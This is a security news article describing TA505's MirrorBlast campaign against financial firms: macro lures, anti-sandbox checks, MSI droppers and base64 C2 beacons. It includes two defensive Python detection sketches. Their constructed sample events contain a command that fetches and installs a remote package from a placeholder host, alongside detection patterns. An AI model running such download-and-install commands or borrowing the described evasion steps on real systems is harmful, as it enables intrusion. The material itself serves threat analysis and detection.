MirrorBlast Campaign Targets Finance Sector Using Macros
TA505 APT Group delivers phishing email containing malicious links
Researchers at Morphisec Labs have published fresh details about a new MirrorBlast campaign that they attribute to the Russia-based threat group TA505 and that targets financial services organizations.
The campaign delivers MirrorBlast through a phishing email containing malicious links that download a weaponized Excel document with embedded macros. The document has very low detection rates on VirusTotal, which, according to Morphisec Labs, makes it dangerous for organizations that rely on detection-based security and sandboxing.
Researchers at ET Labs dubbed the campaign MirrorBlast and first started tracking it in early September. The researchers say similar activity was also observed in April 2021.
The campaign targets organizations in multiple sectors and regions, including Canada, the United States, Hong Kong and Europe.
The initial attack chain started with a malicious email attachment; later stages switched to a Google feedproxy URL with a SharePoint or OneDrive lure posing as a file share request.
"Such URLs lead to a compromised SharePoint or a fake OneDrive site that the attackers use to evade detection, in addition to a sign-in requirement (SharePoint) that helps to evade sandboxes," the researchers note.
These compromised SharePoint and fake OneDrive sites serve a weaponized Excel document with extremely lightweight macro code that can execute only on 32-bit versions of Office, because of ActiveX control compatibility issues.
"The macro code performs anti-sandboxing by checking if these queries are true: computer name is equal to the user domain; and username is equal to admin or administrator," the researchers note. "We have observed different variants of the document; in the first variants there wasn’t any anti-sandboxing and the macro code was hidden behind the Language and Code document information properties. Later it moved to the sheet cells. In addition the code has added one more obfuscation layer on top of the previous obfuscation."
Upon execution, the macro's command runs JScript, which spawns the msiexec.exe process responsible for downloading and installing the MSI package. Researchers observed two variants of the MSI installer, KiXtart and REBOL, both generated with the Windows Installer XML Toolset (WiX).
"Once executed they drop two files into a random directory in ProgramData. One of them is the legitimate software language interpreter executable (KiXtart or REBOL) and the other is the malicious script," the researchers note.
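The chain described above (macro runs JScript, JScript spawns msiexec.exe to fetch and install an MSI, the MSI drops an interpreter and a script into a random ProgramData directory) gives defenders two process-tree observables. The following is an added example, not Morphisec's code or anything recovered from the campaign: a Python sketch that applies both checks to constructed Sysmon-style events. The event field names, the hosting of the JScript in wscript.exe/cscript.exe, the cdn-dl-fileshare.example domain, the gk3Dsw directory and the kix32.exe/stage1.kix file names are assumptions made for illustration.

```python
"""Detection sketch for the MirrorBlast delivery chain (added example, not
Morphisec code). Runs over constructed Sysmon-style events and flags:
  1. an Office ancestor -> script host running JScript -> msiexec.exe with a
     remote http/https package argument;
  2. msiexec.exe writing executables or scripts into an unfamiliar directory
     directly under ProgramData (the "random directory" drop).
Field names, command lines, directory and file names are assumptions."""
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
JSCRIPT_RE = re.compile(r"\.js\b|//e:jscript", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
PROGRAMDATA_RE = re.compile(r"^c:\\programdata\\([^\\]+)\\", re.I)
# Directories legitimately populated by installers on this (assumed) estate; tune per environment.
KNOWN_PROGRAMDATA_DIRS = {"microsoft", "package cache", "usoshared"}
# Interpreter binaries and script extensions worth flagging (assumed list).
DROP_EXTS = (".exe", ".kix", ".r", ".rb", ".js")

# Constructed events: one malicious chain (pids 200-400) and one benign installer (pid 500).
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\bob\Downloads\invoice.xls'},
    {"type": "process", "pid": 300, "ppid": 200, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r"wscript.exe //e:jscript C:\Users\bob\AppData\Local\Temp\loader.txt"},
    {"type": "process", "pid": 400, "ppid": 300, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": "msiexec.exe /i https://cdn-dl-fileshare.example/pkg.msi /qn"},
    {"type": "file", "pid": 400, "target": r"C:\ProgramData\gk3Dsw\kix32.exe"},
    {"type": "file", "pid": 400, "target": r"C:\ProgramData\gk3Dsw\stage1.kix"},
    {"type": "process", "pid": 500, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe", "cmdline": "msiexec.exe /V"},
    {"type": "file", "pid": 500, "target": r"C:\ProgramData\Package Cache\{GUID}\setup.exe"},
]


def image_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_ancestor(proc, procs, max_hops=4):
    """Walk up the parent chain looking for an Office process (tolerates cmd.exe hops)."""
    for _ in range(max_hops):
        proc = procs.get(proc["ppid"])
        if proc is None:
            return None
        if image_name(proc["image"]) in OFFICE:
            return proc
    return None


def detect_msiexec_chain(events):
    """Return [(office_pid, script_pid, msiexec_pid, url)] for Office -> JScript host -> msiexec URL install."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    hits = []
    for proc in procs.values():
        if image_name(proc["image"]) != "msiexec.exe":
            continue
        url = URL_RE.search(proc["cmdline"])
        parent = procs.get(proc["ppid"])
        if not url or parent is None:
            continue
        if image_name(parent["image"]) not in SCRIPT_HOSTS or not JSCRIPT_RE.search(parent["cmdline"]):
            continue
        office = office_ancestor(parent, procs)
        if office is not None:
            hits.append((office["pid"], parent["pid"], proc["pid"], url.group(0)))
    return hits


def detect_programdata_drop(events):
    """Return {directory: [files]} where msiexec.exe wrote droppable files under an unknown ProgramData dir."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    drops = {}
    for e in events:
        if e["type"] != "file":
            continue
        proc = procs.get(e["pid"])
        if proc is None or image_name(proc["image"]) != "msiexec.exe":
            continue
        m = PROGRAMDATA_RE.match(e["target"])
        if not m or m.group(1).lower() in KNOWN_PROGRAMDATA_DIRS:
            continue
        name = image_name(e["target"])
        if name.endswith(DROP_EXTS):
            drops.setdefault(m.group(1), []).append(name)
    return drops


if __name__ == "__main__":
    print("msiexec chains:", detect_msiexec_chain(SAMPLE_EVENTS))
    print("ProgramData drops:", detect_programdata_drop(SAMPLE_EVENTS))
```

The second check is the more durable of the two: the install chain can be re-plumbed (the article notes the actors already changed how the macro and later stages work), but an installer writing an interpreter plus a script into a freshly created ProgramData directory is a narrow behaviour that few legitimate packages share.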
Rebol is a cross-platform data exchange language and a multi-paradigm dynamic programming language; in the Rebol variant, the first-stage Rebol script is base64 encoded, researchers say. It then sends the command-and-control server a base64-encoded GET request containing the user domain, username, OS version, architecture and a Rebol script build number.
The command-and-control server sends back a universally unique identifier (UUID) associated with the victim machine and waits for further commands. Upon receiving a response, the script executes a PowerShell command that downloads an archive file and extracts its content to a folder named "archive," where the next stage of the Rebol script is executed.
"We have also observed a newer version of Rebol script (build=1.0.2) that omits the PowerShell execution part. Instead, it implements the same logic with Rebol language code; this is done to decrease noise and script size (no PowerShell process execution as part of the attack chain). At the time of writing, we couldn't retrieve the next stage Rebol script (payload.rb)," the researchers state.
KiXtart, a free-format scripting language with rich built-in functionality, sends the victim's machine information (domain, computer name, username, process list) to the C2, which responds with further commands, as in the Rebol variant.
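Both the Rebol and the KiXtart first stages described above profile the host and ship the result to the C2 in a base64-encoded GET request. The following is an added example, not Morphisec or campaign code, of how a hunter could sweep proxy logs for such beacons: decode every base64-looking query parameter, tolerating missing padding and the URL-safe alphabet, and keep only those whose plaintext looks like a host profile. The article states only which fields are sent; the log layout ("<client> <method> <url> <status>"), the pipe-separated field order, the parameter name and the cdn-dl-fileshare.example host are assumptions made for the example.

```python
"""Proxy-log hunt for a base64 host-profile beacon (added example, not
Morphisec or TA505 code). The article says the first stage sends a
base64-encoded GET carrying domain, username, OS version, architecture and a
build number; the log format and field layout below are assumptions."""
import base64
import re
from urllib.parse import parse_qsl, urlsplit

ARCH_RE = re.compile(r"^(x86|x64|amd64|32|64)(-bit)?$", re.I)
BUILD_RE = re.compile(r"^\d+(\.\d+)+$")

# Constructed log lines: one beacon (parameter decodes to
# "CORP|jsmith|Windows 10 Pro|x86|1.0.1"), a search with a '+' in it,
# an unpadded base64 value that is just "hello world", and a POST.
SAMPLE_LOG = """\
10.1.2.3 GET https://cdn-dl-fileshare.example/gate?d=Q09SUHxqc21pdGh8V2luZG93cyAxMCBQcm98eDg2fDEuMC4x 200
10.1.2.4 GET https://www.example.com/search?q=base64+padding 200
10.1.2.5 GET https://cdn.example.net/img?id=aGVsbG8gd29ybGQ 200
10.1.2.3 POST https://mail.example.com/owa/ 200
"""


def decode_b64(value):
    """Decode standard or URL-safe base64, adding missing padding.
    Returns the ASCII plaintext, or None when the value is not base64/ASCII."""
    s = value.replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def parse_profile(text):
    """Assumed beacon layout: domain|user|os|arch|build. Returns a dict or None."""
    fields = text.split("|")
    if len(fields) != 5:
        return None
    domain, user, os_ver, arch, build = (f.strip() for f in fields)
    if not (domain and user and os_ver and ARCH_RE.match(arch) and BUILD_RE.match(build)):
        return None
    return {"domain": domain, "user": user, "os": os_ver, "arch": arch, "build": build}


def hunt(log_text):
    """Return [(client, host, profile)] for GET requests whose query carries a host profile."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[1] != "GET":
            continue
        client, url = parts[0], urlsplit(parts[2])
        for _, value in parse_qsl(url.query):
            decoded = decode_b64(value)
            profile = parse_profile(decoded) if decoded else None
            if profile:
                hits.append((client, url.hostname, profile))
    return hits


if __name__ == "__main__":
    for client, host, profile in hunt(SAMPLE_LOG):
        print(f"{client} -> {host}: {profile}")
```

Base64 in a query string is common and benign on its own (the "hello world" line decodes cleanly), so the filter has to key on the decoded structure, not on the encoding. For the KiXtart variant, which also ships a process list, the parse_profile layout would need to be adjusted to whatever layout the captured sample actually uses.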
Attribution to TA505
The researchers attribute the new MirrorBlast campaign to TA505, a Russia-based advanced persistent threat group, because its tactics, techniques and procedures resemble those of earlier TA505 attack chains.
"The similarities extend to the attack chain, the GetandGo functionality, the final payload, and similarities in the domain name pattern," researchers say. “Using SharePoint/OneDrive lure theme and using cdn*dl*fileshare, *onedrive* or *dropbox* as part of the domain name are among other similarities.”
TA505, also referred to as Hive0065 by IBM X-Force, is a financially motivated cybercrime group that has been active since at least 2014 and is believed to operate out of Russia (see: TA505 Group Targeted Corporate Networks With RAT: Report).
"TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals. This new attack chain for MirrorBlast is no exception for TA505 or for other innovative threat groups," researchers note.
In March 2020, the security firm Proofpoint reported that TA505 was using COVID-19 as a lure to target the U.S. healthcare, manufacturing and pharmaceutical industries, spreading malware and ransomware.
"If anything, the shift in the attack chain is a further indication that organizations can ill afford to take a defensive, reactive approach to their security. They must remain constantly vigilant, iterating on security procedures to ensure they are not caught off-guard when new TTPs are deployed to breach their defenses," the researchers warn.
Other TA505 Related Incidents
Also in March 2020, cyber intelligence firm Prevailion found that TA505 was using Trojanized resumes to target German enterprises, compromising networks in order to conduct business email compromise fraud (see: BEC Campaign Targets HR Departments: Report).
The cybercriminal gang has also been implicated in large-scale spam campaigns and in distributing Trojans such as Dridex and The Trick, as well as the Locky and Jaff ransomware, according to researchers (see: TA505 APT Group Returns With New Techniques: Report).
In December 2019, two members of the TA505 gang, also referred to as Evil Corp, were charged with computer and fraud offenses by U.S. and U.K. law enforcement officials. Both men are believed to be living in Russia (see: Two Russians Indicted Over $100M Dridex Malware Thefts).